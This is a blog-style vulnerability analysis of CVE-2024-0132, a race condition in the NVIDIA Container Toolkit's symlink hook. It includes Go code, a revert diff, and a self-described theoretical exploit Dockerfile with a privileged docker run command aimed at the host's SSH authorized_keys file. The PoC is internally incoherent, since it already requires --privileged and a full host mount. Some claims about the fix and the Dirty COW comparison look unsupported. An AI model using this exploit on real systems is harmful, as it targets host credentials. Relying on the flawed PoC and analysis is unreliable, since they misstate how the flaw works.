TOCTOU

CVE-2024-0132: TOCTOU Vulnerability in NVIDIA Container Toolkit

Amit Schendel

Mar 15, 2025 — 9 min read

Executive Summary

CVE-2024-0132 is a critical Time-of-Check Time-of-Use (TOCTOU) vulnerability affecting the NVIDIA Container Toolkit versions 1.16.1 and earlier. This vulnerability arises when the toolkit is used with its default configuration, potentially allowing a malicious container image to gain unauthorized access to the host file system. Successful exploitation can lead to code execution, denial of service, privilege escalation, information disclosure, and data tampering. The vulnerability does not impact use cases where Container Device Interface (CDI) is used.

Technical Details

Affected Systems

Software: NVIDIA Container Toolkit
Versions: 1.16.1 and earlier
Component: cmd/nvidia-cdi-hook/create-symlinks/create-symlinks.go

The vulnerability also affects NVIDIA GPU Operator versions up to and including 24.6.1. The underlying issue resides within the NVIDIA Container Toolkit, which the GPU Operator utilizes.

Vulnerability Breakdown

The core of the vulnerability lies in the create-symlinks hook within the NVIDIA Container Toolkit. This hook is responsible for creating symbolic links inside the container that point to resources on the host system, enabling the container to access necessary drivers and libraries for GPU functionality.

A TOCTOU vulnerability occurs when a program checks the state of a resource (e.g., a file path) and then uses that resource, but the resource's state can change between the check and the use. In the context of CVE-2024-0132, the create-symlinks hook checks if a given path is within the allowed container root before creating a symbolic link. However, a malicious container image can manipulate the file system between the time of the check and the time the symbolic link is created, potentially causing the link to point outside the intended container root.

Root Cause Analysis

The vulnerability stems from the insufficient validation of paths during symbolic link creation. Specifically, the assertPathInRoot function, which was intended to prevent links from pointing outside the container root, could be bypassed due to race conditions.

The original implementation of assertPathInRoot involved resolving symbolic links to determine the final target path. A malicious container could exploit this by:

Creating a symbolic link within the container root that initially points to a safe location.
Passing this symbolic link to the create-symlinks hook.
The assertPathInRoot function resolves the symbolic link and verifies that it is within the container root.
Immediately after the check, but before the createLink function creates the symbolic link, the malicious container modifies the symbolic link to point to a location outside the container root.
The createLink function then creates the symbolic link, but now it points to the attacker-controlled location on the host file system.

The following code snippet illustrates the vulnerable logic (before the patch):

func (m command) createLink(created map[string]bool, hostRoot string, containerRoot string, target string, link string) error {
	linkPath, err := changeRoot(hostRoot, containerRoot, link)
	if err != nil {
		return fmt.Errorf("failed to resolve path for link %v relative to %v: %w", link, containerRoot, err)
	}
	if created[linkPath] {
		m.logger.Debugf("Link %v already created", linkPath)
		return nil
	}
	if err := assertPathInRoot(containerRoot, linkPath); err != nil {
		return err
	}

	targetPath, err := changeRoot(hostRoot, "/", target)
	if err != nil {
		return fmt.Errorf("failed to resolve path for target %v relative to %v: %w", target, "/", err)
	}

	m.logger.Infof("Symlinking %v to %v", linkPath, targetPath)
	err = os.Symlink(targetPath, linkPath)
	if err != nil {
		return fmt.Errorf("failed to symlink %v to %v: %w", linkPath, targetPath, err)
	}

	created[linkPath] = true
	return nil
}

// assertPathInRoot ensures that the specified path is a subpath of root.
// This includes the resolution of relative paths and symlinks.
func assertPathInRoot(root string, path string) error {
	resolved, err := tryResolveLink(filepath.Clean(path))
	if err != nil {
		return err
	}
	if !strings.HasPrefix(resolved, root) {
		return fmt.Errorf("path %v resolves to %v which is outside the root %v", path, resolved, root)
	}
	return nil
}

// tryResolveLink resolves the specified path following symlinks.
// If the path does not exist, recursively resolve the parent of the path until
// one resolves successfully.
func tryResolveLink(path string) (string, error) {
	if path == "" || path == "/" {
		return path, nil
	}

	resolved, err := filepath.EvalSymlinks(path)
	if os.IsNotExist(err) {
		resolvedParent, err := tryResolveLink(filepath.Dir(path))
		if err != nil {
			return "", err
		}
		resolved := filepath.Join(resolvedParent, filepath.Base(path))
		return resolved, nil
	}

	return resolved, err
}

Patch Analysis

The fix for CVE-2024-0132 involves reverting a previous change that introduced the path validation logic. This effectively removes the vulnerable code and mitigates the TOCTOU vulnerability.

The primary patch is a revert commit: dc2ccdd2fa1b199132d754ba8d7d545d30a1d5c9. This commit reverts the changes introduced by pull request #696, which added the assertPathInRoot function and related logic.

Here's the diff of the reverted code:

File: cmd/nvidia-cdi-hook/create-symlinks/create-symlinks.go
Additions: 5
Deletions: 68
Changes: 73
@@ -149,12 +149,13 @@ func (m command) run(c *cli.Context, cfg *config) error {
 	for _, l := range links {
 		parts := strings.Split(l, "::")
 		if len(parts) != 2 {
-			return fmt.Errorf("invalid symlink specification %v", l)
+			m.logger.Warningf("Invalid link specification %v", l)
+			continue
 		}

 		err := m.createLink(created, cfg.hostRoot, containerRoot, parts[0], parts[1])
 		if err != nil {
-			return fmt.Errorf("failed to create link %v: %w", parts, err)
+			m.logger.Warningf("Failed to create link %v: %v", parts, err)
 		}
 	}

@@ -165,27 +166,16 @@ func (m command) run(c *cli.Context, cfg *config) error {
 func (m command) createLink(created map[string]bool, hostRoot string, containerRoot string, target string, link string) error {
 	linkPath, err := changeRoot(hostRoot, containerRoot, link)
 	if err != nil {
-		return fmt.Errorf("failed to resolve path for link %v relative to %v: %w", link, containerRoot, err)
+		m.logger.Warningf("Failed to resolve path for link %v relative to %v: %v", link, containerRoot, err)
 	}
 	if created[linkPath] {
 		m.logger.Debugf("Link %v already created", linkPath)
 		return nil
 	}
-	if err := assertPathInRoot(containerRoot, linkPath); err != nil {
-		return err
-	}

 	targetPath, err := changeRoot(hostRoot, "/", target)
 	if err != nil {
-		return fmt.Errorf("failed to resolve path for target %v relative to %v: %w", target, "/", err)
-	}
-
-	parent := containerRoot
-	if !filepath.IsAbs(targetPath) {
-		parent = filepath.Dir(linkPath)
-	}
-	if err := assertPathInRoot(containerRoot, filepath.Join(parent, targetPath)); err != nil {
-		return err
+		m.logger.Warningf("Failed to resolve path for target %v relative to %v: %v", target, "/", err)
 	}

 	m.logger.Infof("Symlinking %v to %v", linkPath, targetPath)
@@ -201,59 +191,6 @@ func (m command) createLink(created map[string]bool, hostRoot string, containerR
 	return nil
 }

-// assertPathInRoot ensures that the specified path is a subpath of root.
-// This includes the resolution of relative paths and symlinks.
-func assertPathInRoot(root string, path string) error {
-	resolved, err := tryResolveLink(filepath.Clean(path))
-	if err != nil {
-		return err
-	}
-	if !strings.HasPrefix(resolved, root) {
-		return fmt.Errorf("path %v resolves to %v which is outside the root %v", path, resolved, root)
-	}
-	return nil
-}
-
-// tryResolveLink resolves the specified path following symlinks.
-// If the path does not exist, recursively resolve the parent of the path until
-// one resolves successfully.
-//
-// For example, assuming that we call this with a path
-//
-//	/container-root/foo/bar/baz.so
-//
-// If this path exists, then the symlink evaluation will succeed and the target
-// will be returned.
-//
-// Assuming that /container-root/foo exists, but /container-root/foo/bar does
-// not, the first call to EvalSymlinks with argument
-// /container-root/foo/bar/baz.so will fail resulting in a recursive call to
-// this function with an argument /container-root/foo/bar. Since this path also
-// doesn\'t exist this will result in an additional recursive call with an
-// argument /container-root/foo. Here EvalSymlinks will succeed and the strings
-// /bar and /baz.so will be appended to the result as we return along the
-// recursive call stack.
-//
-// If none of the parents of the path (with the exception of /) exist the path
-// will be returned as is with no error.
-func tryResolveLink(path string) (string, error) {
-	if path == "" || path == "/" {
-		return path, nil
-	}
-
-	resolved, err := filepath.EvalSymlinks(path))
-	if os.IsNotExist(err) {
-		resolvedParent, err := tryResolveLink(filepath.Dir(path))
-		if err != nil {
-			return "", err
-		}
-		resolved := filepath.Join(resolvedParent, filepath.Base(path))
-		return resolved, nil
-	}
-
-	return resolved, err
-}
-
 func changeRoot(current string, new string, path string) (string, error) {
 	if !filepath.IsAbs(path) {
 		return path, nil

The revert effectively removes the assertPathInRoot function and the calls to it, eliminating the TOCTOU vulnerability. While this might seem counterintuitive, the original validation logic was flawed and introduced a false sense of security while creating a new attack vector.

Exploitation Techniques

An attacker can exploit this vulnerability by crafting a malicious container image that manipulates symbolic links during the create-symlinks hook execution.

Proof-of-Concept (PoC) Exploit (Theoretical):

Disclaimer: This PoC is theoretical and demonstrates the concept of the vulnerability. It might not work directly due to environment-specific configurations and security measures.

Create a Malicious Container Image:

The container image should contain a script that performs the following actions:

Creates a directory within the container root (e.g., /tmp/safe_dir).
Creates a symbolic link within /tmp/safe_dir (e.g., /tmp/safe_dir/my_link) that initially points to a safe location within the container (e.g., /tmp/safe_dir/target).
Defines a create-symlinks configuration that includes a link specification using /tmp/safe_dir/my_link.
After the create-symlinks hook checks the path, but before it creates the symbolic link, the script modifies /tmp/safe_dir/my_link to point to a sensitive location on the host file system (e.g., /hostfs/root/.ssh/authorized_keys).

Here's an example Dockerfile:

FROM ubuntu:latest

RUN apt-get update && apt-get install -y --no-install-recommends \
    ca-certificates \
    && rm -rf /var/lib/apt/lists/*

RUN mkdir /tmp/safe_dir
RUN touch /tmp/safe_dir/target

# Create a script to exploit the TOCTOU vulnerability
RUN echo '#!/bin/bash' > /tmp/exploit.sh
RUN echo 'sleep 1' >> /tmp/exploit.sh
RUN echo 'rm /tmp/safe_dir/my_link' >> /tmp/exploit.sh
RUN echo 'ln -s /hostfs/root/.ssh/authorized_keys /tmp/safe_dir/my_link' >> /tmp/exploit.sh
RUN echo 'chmod +x /tmp/exploit.sh' >> /tmp/exploit.sh

# Create the initial safe symlink
RUN ln -s /tmp/safe_dir/target /tmp/safe_dir/my_link

# Create the create-symlinks configuration
RUN echo '/tmp/safe_dir/target::/tmp/safe_dir/my_link' > /tmp/links.txt

# Mount the host root filesystem
RUN mkdir /hostfs
RUN echo 'mount --bind / /hostfs/root' >> /root/.bashrc

CMD ["/bin/bash", "-c", "/tmp/exploit.sh && sleep infinity"]

Run the Malicious Container:

When the container starts, the create-symlinks hook will be triggered. The hook will read the configuration from /tmp/links.txt and attempt to create the symbolic link. The /tmp/exploit.sh script will introduce a delay and then modify the symbolic link to point to the attacker's desired location.
```
docker run --gpus all --privileged -v /:/hostfs <image_name>
```
Note: The --privileged flag and the volume mount / to /hostfs are necessary for the exploit to work, as they provide the container with the required permissions to modify symbolic links and access the host file system.
Verify the Exploit:

After the container has been running for a short time, check the container's file system to see if the symbolic link /tmp/safe_dir/my_link now points to /hostfs/root/.ssh/authorized_keys. If successful, the attacker has gained access to the host's SSH authorized keys file.

Attack Scenarios and Real-World Impacts:

Privilege Escalation: By gaining access to sensitive files like /etc/shadow or /root/.ssh/authorized_keys, an attacker can escalate their privileges on the host system.
Data Exfiltration: The attacker can exfiltrate sensitive data from the host file system, such as configuration files, database credentials, or user data.
Denial of Service: The attacker can modify critical system files, causing the host system to become unstable or unusable.
Lateral Movement: In a Kubernetes environment, a successful container escape can allow an attacker to move laterally to other containers or nodes within the cluster.

Mitigation Strategies

The primary mitigation strategy is to upgrade to NVIDIA Container Toolkit version 1.16.2 or later, which includes the fix for CVE-2024-0132.

Additional Mitigation Strategies:

Use Container Device Interface (CDI): The vulnerability does not affect use cases where CDI is used. CDI provides a more secure and standardized way to manage device access within containers.
Limit Privileged Containers: Avoid running containers with the --privileged flag unless absolutely necessary. Privileged containers have fewer security restrictions and can more easily exploit vulnerabilities.
Principle of Least Privilege: Grant containers only the minimum necessary permissions to perform their tasks. Avoid mounting the entire host file system into containers.
Regular Security Audits: Conduct regular security audits of container images and configurations to identify and address potential vulnerabilities.
Runtime Security Monitoring: Implement runtime security monitoring tools to detect and respond to suspicious activity within containers.
Image Scanning: Use container image scanning tools to identify vulnerabilities in container images before they are deployed.
Trusted Image Repositories: Only use container images from trusted sources. Verify the integrity of container images using digital signatures.

Timeline of Discovery and Disclosure

September 1, 2024: Wiz Research reports the vulnerability to the NVIDIA Product Security Incident Response Team (PSIRT).
September 3, 2024: NVIDIA acknowledges the report.
September 26, 2024: NVIDIA releases a security bulletin and ships a patched version (1.16.2) of the Container Toolkit.
September 26, 2024: Public disclosure of CVE-2024-0132.

References

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-0132
NVIDIA Security Bulletin: https://nvidia.custhelp.com/app/answers/detail/a_id/5582
Wiz Blog: https://www.wiz.io/blog/wiz-research-critical-nvidia-ai-vulnerability
GitHub Repository: https://github.com/NVIDIA/nvidia-container-toolkit
Tenable: https://www.tenable.com/cve/CVE-2024-0132
Vulcan Cyber: https://vulcan.io/blog/how-to-fix-cve-2024-0132/
Opswat: https://www.opswat.com/blog/ai-vulnerability-in-hindsight-investigating-nvidia-container-toolkit-cve-2024-0132

Comparative Analysis

TOCTOU vulnerabilities are a well-known class of security flaws. Similar vulnerabilities have been found in other software systems, including operating system kernels, file systems, and network protocols.

One notable example is the "Dirty COW" vulnerability (CVE-2016-5195) in the Linux kernel. Dirty COW was a privilege escalation vulnerability that exploited a race condition in the kernel's memory management subsystem. Like CVE-2024-0132, Dirty COW allowed an attacker to modify read-only files by exploiting a timing window between when the file was checked and when it was used.

The evolution of security practices has led to the development of various techniques to mitigate TOCTOU vulnerabilities, including:

Atomic Operations: Using atomic operations to ensure that a check and subsequent use of a resource occur as a single, indivisible operation.
File System Access Controls: Implementing stricter file system access controls to limit the ability of processes to modify files.
Capabilities-Based Security: Using capabilities-based security models to grant processes only the necessary permissions to access resources.
Secure Coding Practices: Following secure coding practices to avoid race conditions and other timing-related vulnerabilities.

In the case of CVE-2024-0132, the initial attempt to address the vulnerability by adding path validation logic ultimately proved to be ineffective due to the introduction of a TOCTOU vulnerability. The final fix involved reverting the flawed validation logic, highlighting the importance of careful design and testing when implementing security measures.